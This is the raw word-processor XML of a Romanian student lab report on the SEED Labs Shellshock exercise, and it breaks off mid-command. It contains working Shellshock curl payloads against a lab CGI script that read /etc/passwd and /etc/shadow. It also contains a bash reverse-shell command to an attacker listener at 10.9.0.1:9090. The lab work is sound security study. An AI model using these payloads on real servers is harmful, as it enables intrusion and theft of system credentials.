          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>NU</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">-acest </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>fișier este protejat prin permisiuni de acces, astfel încât să fie accesibil doar de către utilizatorul "root" sau un alt utilizator cu drepturi de administrare →</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> observam ca id-ul utilizator al procesului este 33 www-data care nu are privilegiu de a accesa acest fisier ( nu este root)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>Intrebarea 2:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>solicitarile HTTP GET ataseaza de obicei date in adresa URL, dupa marca ”?”.  Acest lucru ar putea fi o alta abordare pe care o putem folosi pentru a lansa atacul. In exemplul urmator, atasam cateva date in URL si am constatat ca datele sunt folosite pentrua seta urmatoarea variabila de mediu: QUERY_STRING=.…</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>AM incercat varianta urmatoare dar am obtinu eroare, la fel si daca nu pun continutul intre “”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">curl  -v </w:t>
      </w:r>
      <w:hyperlink r:id="rId30">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
            <w:b w:val="false"/>
            <w:bCs w:val="false"/>
            <w:i w:val="false"/>
            <w:iCs w:val="false"/>
            <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
          </w:rPr>
          <w:t>http://www.seedlab-shellshock.com/cgi-bin/</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
            <w:b w:val="false"/>
            <w:bCs w:val="false"/>
            <w:i w:val="false"/>
            <w:iCs w:val="false"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
          </w:rPr>
          <w:t>vul</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
            <w:b w:val="false"/>
            <w:bCs w:val="false"/>
            <w:i w:val="false"/>
            <w:iCs w:val="false"/>
            <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
          </w:rPr>
          <w:t>.cgi</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>?"() { echo salut;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">}; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>echo Content_type: text/plain; echo; /bin/cat /etc/passwd"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>=&gt; nu putem</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="x-none" w:eastAsia="x-non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331660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1"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3316605"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Sarcina 4: Ob</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ro-RO"/>
        </w:rPr>
        <w:t>ț</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>inerea unui shell conectat la atacator prin atacul Shellshock</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>Ideea acestei sarcini consta in obtinerea unui reverse shell, un proces este lansat pe masina aflata la distanta, iar intrarea si iesirea sa sunt controlate de la distanta de pe un alt calculator</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="143"/>
        <w:rPr>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">programul folosit pentru deschiderea unor astfel de conexiuni este </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">netcat </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> prin optiune -l va deveni un server de TCP care asculta o conexiune pe portu specificat</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>Vom folosis netcat pe masina virtuala pentru a asculta pe portul 9090; observam la rularea pe masina virtuala a comenzii ifconfig reteaua 10.0.9.1 in care ruleaza containerul</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="x-none" w:eastAsia="x-non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15000" cy="260413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2"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5715000" cy="2604135"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">presupunem ca atacatorul este masina noastra virtuala care va asculta pe portul 9090: prin comanada: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>netcat -l 9090 -k</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="x-none" w:eastAsia="x-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15000" cy="6515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3"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5715000" cy="651510"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="29"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">atacam programul server printr-un curl in care injectam prin intermediul unei variabile, de exemplu </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">BIRLUTIU, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>un cod prin care se creeaza un reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="29"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">shell-ul interactiv se va deschide prin: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>/bin/bash -i &gt; /dev/tcp/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C9211E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">10.9.0.1/9090 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>0&lt;&amp;1 2&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="29"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">stdout si stdin prin tcp </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="00A933"/>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>comanda completa:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>BIRLUTIU</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>() { echo salut;}; echo Content_type: text/plain; echo;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>/bin/bash -i &gt; /dev/tcp/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="C9211E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">10.9.0.1/9090 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>0&lt;&amp;1 2&gt;&amp;1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>" -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">v </w:t>
      </w:r>
      <w:hyperlink r:id="rId34">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
            <w:b w:val="false"/>
            <w:bCs w:val="false"/>
            <w:i w:val="false"/>
            <w:iCs w:val="false"/>
            <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
          </w:rPr>
          <w:t>http://www.seedlab-shellshock.com/cgi-bin/</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
            <w:b w:val="false"/>
            <w:bCs w:val="false"/>
            <w:i w:val="false"/>
            <w:iCs w:val="false"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
          </w:rPr>
          <w:t>vul</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
            <w:b w:val="false"/>
            <w:bCs w:val="false"/>
            <w:i w:val="false"/>
            <w:iCs w:val="false"/>
            <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
          </w:rPr>
          <w:t>.cgi</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>am executat comanda si am obtinut reverse shell-ul si putem observa cum am obtinut un shell interactiv a carui iesire este tcp si intrarea la fel prin tcp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="x-none" w:eastAsia="x-no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38100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5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3810000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>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Heading2"/>
        <w:rPr>
          <w:lang w:val="ro-RO"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Sarcina 5: Utilizarea Bash corectat</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="0"/>
        <w:rPr>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">In prima faza, pentru a folosi un bash corectat, am modificat in interiorul containrul fisierul </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">vul.cgi </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">#!/bin/bash </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>si am repetat apoi pasii de la sarcina 3 si 4 ( una dintre aceste sarcini)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="25">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>185420</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-635</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5406390" cy="13811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6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5406390" cy="1381125"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>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drawing>
          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="26">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>787400</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>59690</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4257675" cy="19145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7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4257675" cy="1914525"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:lang w:val="x-none" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>in continuare incercam un atac de tipul celui de la 3 prin care incercam sa afisam continutul fisierului etc/shadow:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>curl -A "() { echo salut;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">}; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">echo Content_type: text/plain; echo; </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="1440" w:hanging="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
